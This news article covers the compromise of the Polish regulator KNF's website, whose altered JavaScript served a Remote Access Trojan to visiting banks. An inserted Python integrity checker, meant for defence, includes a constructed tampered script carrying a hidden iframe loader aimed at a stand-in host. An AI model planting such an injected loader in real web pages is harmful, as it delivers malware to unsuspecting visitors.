It is not yet known what was stolen as the exfiltrating traffic was encrypted

Polish banks have reportedly been infected with malware originating from their own financial regulator. Several unnamed banks were infected by as-yet-unidentified malware traced to the Polish Financial Supervision Authority (KNF), which, ironically enough, oversees the information security of Polish banks.

Several banks reported attacks during the week of 30 January after noticing suspicious files and encrypted traffic flowing through their networks to unfamiliar IP addresses. Investigation revealed malware on servers and workstations, and tracing it back led the banks to the source, which, strangely enough, was their own regulator.

Attackers had apparently turned the regulator's website into a watering hole. They altered a JavaScript file on the site so that when users visited, an iframe would download a file onto their computers which, when executed, would load a Remote Access Trojan (RAT). While banks have reportedly reassured customers that they have not yet detected any unauthorised transactions, they do not yet know exactly what was stolen, as the outgoing traffic was encrypted.
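The chain described above, a served script altered to inject an iframe that pulls a payload, is the kind of change a site operator can catch by checking served scripts against a known-good hash and flagging iframe creation or off-site hosts. The following checker is an added example, not code from the article, from KNF or from the affected banks; the script contents, the baseline hash and the hostnames are constructed for illustration.

```python
import hashlib
import re

# Constructed sample: a known-good copy of a site script and a tampered copy
# into which a hidden iframe loader has been inserted (hypothetical content).
CLEAN_JS = "function init(){document.getElementById('nav').classList.add('ready');}\n"
TAMPERED_JS = CLEAN_JS + (
    "var f=document.createElement('iframe');f.style.display='none';"
    "f.src='http://example.invalid/loader';document.body.appendChild(f);\n"
)

# Patterns that create or write an iframe from script. A site's own scripts
# rarely do this, so a hit in a file that changed unexpectedly is a signal.
IFRAME_PATTERNS = [
    re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I),
    re.compile(r"<iframe\b", re.I),
]
# Attempts to keep the injected element invisible to the visitor.
HIDDEN_PATTERNS = [
    re.compile(r"display\s*:?\s*=?\s*['\"]?none", re.I),
    re.compile(r"visibility\s*:?\s*=?\s*['\"]?hidden", re.I),
]
URL_PATTERN = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def sha256_hex(data: str) -> str:
    """Baseline hash of a script as deployed (what a release pipeline would record)."""
    return hashlib.sha256(data.encode("utf-8")).hexdigest()


def inspect_script(js: str, expected_hash: str, own_hosts: set) -> dict:
    """Compare a served script with its baseline and report injection indicators."""
    offsite = {h.lower() for h in URL_PATTERN.findall(js)} - {h.lower() for h in own_hosts}
    findings = {
        "hash_mismatch": sha256_hex(js) != expected_hash,
        "creates_iframe": any(p.search(js) for p in IFRAME_PATTERNS),
        "hidden_element": any(p.search(js) for p in HIDDEN_PATTERNS),
        "offsite_hosts": sorted(offsite),
    }
    # Only a changed file that also loads an iframe or an off-site host is escalated;
    # a hash mismatch alone may be a legitimate deployment.
    findings["suspicious"] = findings["hash_mismatch"] and (
        findings["creates_iframe"] or bool(findings["offsite_hosts"])
    )
    return findings


if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_JS)
    print(inspect_script(TAMPERED_JS, baseline, {"regulator.example"}))
```

In practice the baseline hashes come from the deployment pipeline and the check runs against what the web server actually serves, so a change made directly on the server shows up as a mismatch.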

Ilia Kolochenko, CEO of High-Tech Bridge told SC Media UK that we should be expecting attackers to get more crafty as we get more vigilant, “In the past, hackers used one-off or garbage websites to host malware, but as corporate users become more educated and vigilant, attackers need to find more reliable avenues to deliver malware and enter corporate networks.”

“That's why Gartner, and other independent research companies, continuously say that the risk of corporate web applications is very high and seriously underestimated. Spear-phishing and watering hole attacks against high-profile websites will significantly grow in the near future.”

There has been little news on the nature of the attackers, but KNF's website, which banks visit regularly, seems like a golden opportunity for a cyber-criminal group looking to target banks. David Jones, global head of payments and banking at Irdeto, explained to SC, “As banking systems become more connected or share common access points (such as a regulatory body), it is important to recognise that standard network protocols are inadequate to prevent advanced cyber-attacks. Web apps/APIs and JavaScript can be tampered with and their data intersected. This is due to the environment supported by modern browsers and the inherent lack of security in the open internet.”

The KNF released a statement to press, saying that though the website was infected, KNF systems themselves are safe and “the work of the office run(s) unimpeded”.

The regulator's website has been taken offline by its administrator and is currently inaccessible. The incident has been reported to Polish CERT.

KNF did not respond to requests for comment.